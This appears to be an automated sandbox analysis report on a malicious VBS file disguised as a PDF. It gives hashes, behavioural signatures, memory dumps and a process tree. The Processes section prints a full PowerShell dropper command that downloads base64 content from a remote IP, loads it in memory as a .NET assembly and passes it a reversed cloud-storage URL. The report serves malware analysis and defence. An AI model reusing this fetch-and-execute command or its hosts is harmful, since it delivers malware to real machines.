Analysis
- max time kernel: 45s
- max time network: 48s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 28-09-2022 19:31

Static task: static1
Behavioral task: behavioral1
- Sample: TV06KSFYOU_002_PDF.vbs
- Resource: win7-20220812-en (windows7-x64)
- 5 signatures, 150 seconds
General
- Target: TV06KSFYOU_002_PDF.vbs
- Size: 577KB
- MD5: 92be06b804449682d272f3afc76aca5f
- SHA1: f575b8712aa0f0720b6ad981ca8bbe682badd1d8
- SHA256: e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9
- SHA512: 09b067ad4507a7efbd075a3d8400e63627d62d4bf9e542fb527755eac71240e556ae9b4f45e408e2b4d9dfe42688c18b9dd0a4007ca23dc77d8d16449808068c
- SSDEEP: 96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHA:cKLosxvRG
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): http://20.7.14.99/dll/dll_ink.pdf
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 3, pid 868, process powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid 868, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description Token: SeDebugPrivilege, pid 868, process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    PID 1812 wrote to memory of 868: WScript.exe -> powershell.exe
    PID 1812 wrote to memory of 868: WScript.exe -> powershell.exe
    PID 1812 wrote to memory of 868: WScript.exe -> powershell.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TV06KSFYOU_002_PDF.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdbd2471442d-d42a-e044-ff2d-d8c5491d=nekot&aidem=tla?txt.hdcnysaer/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/868-55-0x0000000000000000-mapping.dmp
- memory/868-57-0x000007FEF3710000-0x000007FEF4133000-memory.dmp (10.1MB)
- memory/868-58-0x000007FEF2BB0000-0x000007FEF370D000-memory.dmp (11.4MB)
- memory/868-59-0x00000000028E4000-0x00000000028E7000-memory.dmp (12KB)
- memory/868-60-0x00000000028EB000-0x000000000290A000-memory.dmp (124KB)
- memory/868-61-0x00000000028E4000-0x00000000028E7000-memory.dmp (12KB)
- memory/868-62-0x00000000028EB000-0x000000000290A000-memory.dmp (124KB)
- memory/1812-54-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp (8KB)